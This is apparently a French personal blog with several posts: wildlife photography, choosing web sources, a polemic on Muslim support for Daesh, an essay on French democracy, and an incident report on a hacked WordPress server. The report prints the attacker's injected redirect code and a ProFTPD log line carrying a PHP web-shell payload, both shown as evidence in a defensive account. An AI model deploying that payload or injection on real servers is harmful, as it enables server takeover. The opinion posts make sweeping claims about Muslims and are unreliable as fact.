Chasse photographique et Pokémon GO

Depuis que j’ai reçu un appareil photo suffisamment bon j’essaie de faire de la chasse photographique. Cette discipline consiste à tenter de réaliser l’image d’un animal sauvage et libre dans son milieu naturel.
J’ai remarqué une similarité avec le cœur du gameplay de Pokémon GO où if faut chasser et tenter de capturer des Pokémons dans le monde réel.

Je n’ai pas réussi beaucoup de photos, mais en voici quelques-unes (malheureusement imparfaites, il me faut plus d’entraînement):

papillon cignes libellule libellule libellule cigogne libellule

Et voici d’autres photos n’entrant pas dans les critères de la chasse photographique :

canards tortues d'eau paon coqs

Comment sélectionner ses sources d’informations sur le web ?

Tout comme vous, je manque souvent de temps libre et même si vous avez énormément de temps libre il est impossible de consulter toute l’information produite. J’ai donc eu besoin de mettre en place une méthode pour optimiser la qualité de l’information que je consulte. Bien entendu je privilégie des sujets liés à mes centres d’intérêt, mais comment savoir si je vais lire des contenus de qualité ?

Évaluer la qualité d’une information n’est pas toujours facile. Souvent ces méthodes permettent d’évaluer la qualité d’un article et de trouver correctement la réponse à une question posée, mais ne permettent pas d’estimer la qualité des publications futures, oublie des particularités du web et sont trop lourdes à mettre en place dans le cadre d’une veille informationnelle où vous avez une liste de sources.
L’objectif de cet article est d’offrir une méthode pour sélectionner des sources fiables à consulter périodiquement et d’avoir une résilience (une tolérance à l’erreur) dans les renseignements obtenus.
Il ne s’agit pas ici de présenter une solution technique pour le faire. Cependant, ce travail de sélection n’est pas automatisable donc toutes solutions algorithmiques le faisant à votre place sont inapplicables (mur Facebook, suggestions Youtube, etc.). Je suppose également que vous savez trouvez une grande quantité de sources sur les sujets qui vous intéressent.

Les médias sur internet

Internet permet à tout le monde de s’exprimer publiquement et potentiellement anonymement.
Ni l’anonymat ni l’expression publique massive est néfaste pour la qualité de l’information. Si vous savez comment sélectionner correctement vos sources dans ce nouveau paradigme de l’information alors vous êtes mieux informé dans un monde avec internet que sans.

Je vais distinguer trois types d’informations (l’opinion, l’actualité, la science/technique). Quand on lit un article on a souvent à faire à un mélange des trois et une opinion sous-jacente est quasiment toujours présente. Chacune à des spécificités qu’il faut comprendre pour être correctement informé.

La communauté

Sur internet l’un des éléments les plus importants quand on cherche à s’informer est la capacité du média à accepter la critique et à se corriger.

Prenons un blog. Pour voir si ce dernier accepte la critique on devrait pouvoir observer la possibilité de poster des commentaires critiques sous les articles polémiques. S’il n’y a pas de commentaire critique cela peut être dû à une faible visibilité du blog. Vous pouvez tenter d’en poster un et voir s’il passe la modération 😉

Même si un blog accepte la critique cela ne signifie pas que celui-ci ait la capacité (nombre d’erreurs signalés) ou l’envie de se corriger. Ceci peut se vérifier également en cherchant si parmi les articles proposés certaines des données factuelles ont été modifiées suite à un commentaire pointant l’erreur.
Un blog qui a peu de visiteurs et qui ne fait pas partie d’une communauté comme « le café des sciences » aura forcement une capacité à se corriger faible. S’il y a peu ou pas de rectifications il faut absolument à avoir d’autres sources abordant les mêmes thèmes.

Les sources

Les sources et leur qualité est souvent le premier critère auquel on pense. Souvent considéré comme le critère le plus important je le vois comme un critère difficile à évaluer, à double tranchant et dont la nécessité varie en fonction du sujet. Le plus important est de pouvoir vérifier les faits énoncés.

Lorsqu’un article est à propos d’une nouvelle découverte scientifique ou d’une actualité il nécessite absolument une source. Il faut pouvoir retrouver facilement l’original (pour éviter l’effet du téléphone arabe), le lire, évaluer sa qualité, etc.

Lorsqu’il s’agit de transmettre des connaissances établies ou de faits utilisés pour promouvoir une opinion alors le gros de la vérification est aisé. Le plus souvent on devrait pouvoir les retrouver dans Wikipédia, l’actualité, le consensus scientifique, etc.
Si les faits ne se retrouvent pas facilement alors les sources données sont une aide nécessaire mais non suffisante. Il est possible que l’auteur ait eu un biais de confirmation et que les sources citées soient issues d’un cherry picking inconscient. Ces sources d’apparence valides pourraient vous induire en erreur. Il faut toujours pouvoir faire une vérification indépendante avec des sites fiables.

La reproductibilité

Avant d’inclure un site web parmi vos sources d’informations il faut que vous soyez sûr que celui-ci est, le plus souvent, fiable. C’est un gros travail, il s’agit de vérifier la fiabilité d’articles dont les sujets sont reproductibles par nature.

Pour les sujets techniques il s’agit principalement de pouvoir reproduire soit même l’objet de l’article. S’il s’agit de code source informatique c’est simple, il suffit de tester. Pour des sujets plus complexes ou longs il faut pouvoir trouver des retours de personnes l’ayant essayé pour pouvoir évaluer sa qualité.

Les médias aiment bien les résultats sexy et auront tendance à servir de relais à des études uniques ou contredisant les connaissances établies indépendamment de la qualité de l’étude. Cependant, la science doit bien sûr fournir des résultats reproductibles. Lorsque l’on a en face de soit un article traitant de science il faut se demander de quel niveau de preuve (très utilisé en médecine) il s’agit. Avons-nous à faire à une étude isolée, un corpus de publication, une méta-analyse, un consensus scientifique, une théorie scientifique ? L’article de vulgarisation présente-t-il le sujet honnêtement ?

Les articles techniques et scientifiques ne sont évidemment pas de la même nature que le reste de l’actualité ou que les opinions. Les difficultés à surmonter ne sont pas les mêmes, mais j’ai tendance à penser que la technique et la science sont « faciles » à vérifier. Si un journal fait constamment des erreurs sur ces sujets, comment peut-on leur faire confiance pour le reste de l’actualité ? Pire, si leur opinion est basée sur des prémisses erronées alors au moins une partie du cheminement pour tirer les conclusions n’est pas pertinent.

La redondance de l’information

Personne n’est à l’abri d’une erreur. Les sites web auxquels vous faites confiance peuvent également se tromper ou vous pouvez mal comprendre un concept qu’ils cherchent à faire passer. Pour augmenter la chance d’avoir une information valide et diminuer le risque de rester dans l’erreur il faut avoir des sources multiples par thème.

Quand l’information est fraîche il est très facile de se piéger soit même et d’avoir des sources qui se citent entre elles ou se base sur la même source primaire (tout organisme de la presse classique française se base principalement sur l’AFP) et ainsi d’avoir l’illusion d’obtenir une information vérifiée par plusieurs organismes (ce qui devrait être le cas) alors qu’elle est répétée en cœur. Rajouter des médias étrangers est une solution partielle.

Pour les actualités classiques le plus important est de ne pas sauter sur la nouveauté. L’actualité est souvent présentée sous un angle particulier alors même que les faits sont trop flous pour pouvoir être analysés correctement. Pour pouvoir traiter l’actualité correctement il faut soit être branché dessus 24/24 soit la laisser décanter.
Si vous choisissez la seconde option, une fois la folie médiatique retombée vous pouvez aller chercher et lire un article synthétisant les faits (sur Wikipédia par exemple). Puis aller lire les articles de vos sources d’information ainsi vous serez en mesure d’être plus critique.

Lorsqu’une découverte scientifique est faite tous les articles dérivent d’une seule publication originale ayant passée la revue par les pairs. C’est un cas particulier, en principe la vérification a déjà été faite, mais son degré de certitude est souvent faible (lié au niveau de la preuve) pour l’augmenter il faut lire des personnes capables de comprendre le domaine et de chercher la petite bête. Si vous êtes suffisamment à l’aise avec la méthode scientifique vous pouvez également aller lire la publication originale (gratuit et légal si elle est en libre accès. Pour tout le reste il y a Sci-Hub).

La recherche de la contradiction

Malgré le paradoxe apparent de rechercher la contradiction alors que l’on cherche également de la redondance il est important de mettre en doute nos connaissances, nos opinions et nos pratiques.

“Le premier principe est que vous ne devez pas vous duper — et vous êtes la personne la plus facile à duper.”
― Richard Feynman
On tend naturellement à aller chercher l’information qui conforte notre opinion. Or pour se tromper le moins possible la meilleure solution est de mettre en doute son avis en se confrontant à d’autres idées.

Lire, écouter ou visionner des opinions qui ne sont pas les nôtres est difficile. Par exemple, lorsque je consulte un avis qui n’est pas le mien je vois très rapidement lorsqu’il y a une erreur logique ou une erreur factuelle. Je cherche donc un autre messager, mais je suis moins patient que si je partage une vision proche.
Si vous rencontrez le même problème vous pouvez tenter d’appliquer une solution partielle (car vous continuerez d’entendre plus votre avis que celui opposé) : écouter des débats. Au pire vous rigolerez bien. Au mieux ça vous permettra de commencer une réflexion ou de trouver quelqu’un d’intéressant avec une opinion différente construite sur des bases solides.

99% des musulmans ne soutiendraient pas Daesh. Vraiment ?

Cet article fait office de commentaire sur l’épisode « De Bernardo Gui à Daesh » de Temporium Radio.

Timeline est un podcast sur l’histoire et qui, de temps en temps, remet l’actualité dans un contexte plus historique. Malheureusement cet épisode aborde l’actualité tout en ayant une réflexion extrêmement pauvre sur la situation là-bas. Normalement, dans ce cas de figure, je laisse un commentaire mais l’inscription est obligatoire…

D’après un intervenant 99% des musulmans sunnites dans le monde ne reconnaîtrait pas Daesh comme un califat légitime. D’où vient cette statistique au doigt mouillé ?
Au Moyen-Orient il y a une forte proportion de fondamentalistes religieux. Des blogueurs athées sont sur des listes de personnes à abattre. Des personnes ouvertement athée sont condamnés dans leurs états respectifs. Une trop grande partie de la population est d’accord avec la peine de mort pour ce terrible crime qu’est l’apostasie ou soutiendrait moralement Al-Qaïda (qui est également un califat). Je me demande bien où vous voyez ce monde musulman moderne et tolérant qui ne permettrait pas à genre de califat nauséabond de s’étendre.

Il faut se rendre compte qu’au Moyen-Orient Daesh n’est pas systématiquement vue comme extrémiste. Ceux qui sont systématiquement vus comme extrémistes tuent leur famille avant de rejoindre Daesh et, d’après la population soutenant Daesh, ne représenteraient pas ce mouvement.

J’aimerais que la population de ces pays ne soit pas en accord avec la charia et Daesh, mais je ne projette pas un espoir non vérifié plutôt que la réalité. Malheureusement le Moyen-Orient contient bien plus d’un pourcent de fou de dieu.

La France n’est pas une démocratie

Nous ne sommes pas dans une démocratie. Certaines personnes, dont nos dirigeants, disent souvent que nous sommes dans une démocratie représentative. D’autres, moins aveugles, disent que nous sommes dans une république démocratique. Ce n’est pas faux d’un point de vue théorique, mais ce type de régime n’est pas une démocratie. Dans la pratique ce type de gouvernement est souvent soumis à des dérives oligarchiques.

Une démocratie nécessite que le peuple soit souverain. Pour la forme la plus légère de la démocratie (la démocratie représentative) cela nécessite quatre conditions sans lesquelles elle ne peut pas exister.

Avoir les caractéristiques d’une république démocratique

Une démocratie représentative doit posséder les caractéristiques d’une république démocratique. J’aime bien la définition qu’en donne l’internaute :
-République qui se caractérise notamment par un État de droit, un suffrage universel, une souveraineté nationale, mais aussi des partis politiques libres et des libertés publiques.

La France et la plupart des pays du Nord se disant être des démocraties présentent ces caractéristiques. À l’exception, peut être, des libertés publiques ou les doutes sont légitimes.

Des mandats impératifs

Un mandat impératif permet de confier une mission qui doit être menée. Prenons comme exemple le cas d’une élection présidentielle :
Différent candidats se présentent. Tous ont un programme politique. Celui qui sera élu se verra imposer son programme comme mission à mettre en œuvre pendant les X années de son mandat. Les ministres qu’il nomme ont bien entendu la même mission que lui.
En France, le programme avec lequel nos représentants se font élire ne présente pas cette contrainte. Ils sont libre de faire la politique qu’ils souhaitent après avoir été élu.

Le mandat impératif est nécessaire pour un contrôle a priori. Il permet au peuple non seulement de choisir son représentant, mais aussi d’avoir une influence sur la politique mise en œuvre.

Des référendums

À l’inverse de ce qui s’est passée récemment avec l’utilisation du 49-3 pour faire passer l’impopulaire loi travail. Si des citoyens manifestent une objection sur un projet de loi alors un référendum doit avoir lieu et l’avis du peuple doit être suivi.

Cela permet un contrôle continu sur les dérives potentielles du gouvernement élu.

La ciguë

Le titre de ce paragraphe est provocateur mais l’idée est là. Lorsque le mandat des membres du gouvernement arrive à leur fin les citoyens doivent être en mesure d’évaluer et de punir ces derniers si besoin. La peine de mort est probablement exagérée, mais une peine de prison est tout à fait adaptée. Le prix à payer pour la mauvaise gestion d’un pays peut être élevé et les responsables ne peuvent pas rester impuni.

C’est un contrôle à posteriori pour garantir le respect du mandat. Une invitation pour les fainéants, les coureurs de jupons et les détourneurs de fonds qui manquent de temps pour leur travail à trouver un job sans ce type de responsabilités.

Comment gérer une intrusion serveur sans expérience en sécurité ?

Le 30 avril j’ai eu à gérer une intrusion sur mon serveur. L’objectif de cet article est de partager cette mésaventure pour permettre à ceux qui se retrouveraient dans la même situation et qui ne possèdent aucune expérience en sécurité informatique (ce qui est mon cas) d’agir de façon correcte.
Comme d’habitude le retour et la critique seront appréciés 😉 .

Le réveil

Samedi 30 avril, après une phase de réveil, je regarde mes courriels. Le 29/04 à 22h20 j’ai reçu un courriel étrange de la part de Google Search Console Tools, sobrement intitulé « Nouveau propriétaire pour http://omnos.fr ». Ça fait peur. Ni une ni deux je me connecte à l’outil de Google et je constate effectivement l’ajout d’un propriétaire et d’une adresse : « http://omnos.cnruby.net ». Il est impossible d’ajouter un propriétaire sans l’ajout d’un fichier sur mon serveur donc je me connecte via SSH et je vais voir. Effectivement un fichier a été ajouté. Ce n’était pas le seul, mais je ne le savais pas encore.

Je décide d’investiguer de façon minutieuse avant de faire quoi que ce soit d’autre. L’auteur du piratage a eu plus de 10 heures devant lui. Par conséquent je n’avais aucune raison de me presser.
Je n’avais pas une idée très claire de ce que j’allais faire ensuite, mais au final mon action peut se résumer en quatre phases :
– Investiguer : comprendre comment l’attaque a eu lieu et sa portée (uniquement sur mon blog WordPress ? Sur les services web ? Sur tout mon serveur ? )
– Bloquer les accès utilisés depuis l’extérieur.
– Réparer les dégâts.
– Savoir si d’autres ont subi ce piratage et les prévenir.

Rétrospectivement je pense que c’est un bon schéma à appliquer, mais comme vous allez pouvoir le lire, la pratique était un peu plus brouillonne.

L’investigation

J’ai regardé les dates de modification des fichiers dans le dossier de WordPress et j’ai vu que les fichiers index.php et xmlrpc.php avaient été modifiés pour rajouter ceci :

1
2
3
4
5
6
7
8
include("/var/www/wordpress/wp-content/plugins/duplicator/classes/tabgeo_country_v4.php");
$ip = $_SERVER['REMOTE_ADDR'];
$country_code = tabgeo_country_v4($ip);
if ($country_code != 'FR') {
	header("HTTP/1.1 301 Moved Permanently");
	header("Location: http://omnos.cnruby.net/");
	exit();
}

Ce code utilise un plugin WordPress désactivé pour connaître l’origine de l’IP et applique une redirection vers un site (qui est une copie de la page d’accueil de mon blog) si l’IP n’est pas française. J’ai eu de la chance, j’aurais pu ne pas remarquer cette intrusion pendant des semaines. Je ne sais toujours pas à quoi cette modification peut lui servir concrètement donc si vous avez une idée signalez-la moi 😉 .
D’autres fichiers ont été rajoutés dans des sous-dossiers. Malheureusement je ne l’ai pas vu tout de suite, car, chose que je ne savais pas, la date de dernière modification d’un dossier ne correspond pas forcément à la date de la dernière modification ou du dernier ajout d’un fichier dans ce dossier.

À partir de ce moment j’ai décidé de demander de l’aide à des personnes plus compétentes. Je conseille à tous d’aller faire un tour sur le channel IRC ##security de freenode en cas de problème.

On a scanné les ports de mon serveur, donné des conseils et regardé si des failles connues existaient sur les différents logiciels installés sur mon serveur pendant que je regardais les logs (SSH, Apache, WordPress). Un peu après que l’un d’entre eux ait trouvé la faille utilisée (une faille de ProFTPD qui aurait dû être mis à jour depuis longtemps dans les paquets de ma distribution), j’ai trouvé, dans les logs de WordPress, des requêtes étranges spécifiques du moment de l’attaque:

1
ip.de.pc.zombi - - [29/Apr/2016:22:19:19 +0200] "POST /wp-admin/network/cacheplugin.php HTTP/1.1" 200 4550 "http://omnos.fr/wp-admin/network/cacheplugin.php" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"

Après l’avoir annoncé sur le chan IRC l’un d’eux a répondu que l’attaquant avait utilisé mon installation WordPress cassée.

Je ne sais pas si c’est par manque de temps (il me restait une heure devant moi avant d’être absent) ou si j’espérais que le pirate ait exploité une faille WordPress plutôt que la faille ProFTPD qui a bien plus d’impact. J’ai choisi d’attribuer la faille exploitée à WordPress (ou à ma configuration de WordPress) et de passer au blocage du pirate. Je regarderai ce fichier cacheplugin.php plus tard.
Cette grave erreur m’a coûté une investigation plus poussée à faire à posteriori.

Le blocage

J’ai désinstallé ProFTPD. J’ai coupé l’accès du pirate mais j’ai perdu les logs (purge).
J’ai fait les mises à jour système (que j’effectue régulièrement). Les mises à jour ont modifié beaucoup de fichiers ce qui a rendu mon investigation avancée plus compliquée.
J’ai changé le mot de passe de la base de données utilisée par WordPress. C’était nécessaire.
J’ai fait un cp sur le dossier contenant le blog puis j’ai remplacé le contenu de l’original par un index.html annonçant le problème. J’aurais dû faire un mv pour ne pas changer les dates de dernière modification.

Je pars de chez moi.

L’investigation avancée

Entre-temps j’ai été contacté par Vassili qui a proposé son aide pour chercher d’autres sites piratés par la même personne.
De retour chez moi j’accepte son aide et je regarde le fichier cacheplugin.php situé dans wp-admin/network. Il me semble très étrange d’avoir un fichier WordPress comme cela, je télécharge donc une version propre et effectivement ce fichier n’est pas présent. Un autre du même dossier est spécifique à mon installation, le dénommé debugvr.php contenant :

1
proftpd: ip.de.pc.zombi:60100: SITE cpto /tmp/.< ?php eval($_REQUEST[cmd]); echo G00D;?>

Et voilà, je me rends compte que c’est la faille de ProFTPD qui a été utilisée. Ça change tout.
J’utilise find pour trouver tous les fichiers modifiés durant la période de l’attaque :

1
find / -mmin -1440 -mmin +1020 -print

Puis pour trouver tous les fichiers modifiés depuis (ils auraient pu être remodifiés par le système ou moi-même):

1
find / -mmin -1440 -print

Cela m’a pris beaucoup de temps et j’ai pu manquer des choses. N’ayant rien trouvé d’autre de suspect j’ai décidé de remettre le blog en ligne.

La remise en ligne

J’ai conservé la même base de données, changé le mot de passe de mon compte et récupéré une installation WordPress propre à laquelle j’ai ajouté les médias, puis réinstallé les extensions.

Que faire d’autre ?

C’était plutôt difficile et long, mais je suis content d’avoir eu de la chance dans ma malchance. La faille aurait pu permettre de faire bien pire.

Il me reste bien sûr à contacter les sites web trouvés par Vassili. Je compte également faire une réinstallation complète à moyen terme (j’ai peut-être loupé des choses). Si vous avez d’autres suggestions n’hésitez pas 😉